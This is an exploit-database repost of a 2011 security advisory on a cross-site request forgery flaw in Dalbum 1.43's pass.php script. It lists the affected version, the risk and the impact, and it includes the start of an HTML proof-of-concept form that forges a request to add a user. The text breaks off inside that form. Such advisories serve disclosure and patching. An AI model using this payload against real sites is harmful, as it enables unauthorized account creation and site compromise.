Dalbum 1.43 Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Dalbum 1.43 Multiple Vulnerabilities
# Published : 2011-04-19
# Author :
# Previous Title : DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities
# Next Title : TinyBB v1.4 Blind Sql Injection and Path Disclosure

===============================
Vulnerability ID: HTB22941
Reference: http://www.htbridge.ch/advisory/csrf_cross_site_request_forgery_in_dalbum.html
Product: Dalbum
Vendor: http://www.dalbum.org/ ( http://www.dalbum.org/ ) 
Vulnerable Version: 1.43
Vendor Notification: 05 April 2011 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
The vulnerability exists due to failure in the "pass.php" script to properly verify the source of HTTP request.

Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

Attacker can use browser to exploit this vulnerability. The following PoC is available:

[html]
<form action="http://[host]/pass.php" method="post" name="main" />
<input name="user" value="1" type="hidden" />
<input name="pass" value="1" type="hidden" />
<input name="passc" value="1" type="hidden" />
<input type="hidden" name="action" value="add">
<input type="submit" id="btn" name="submit" value="Submit a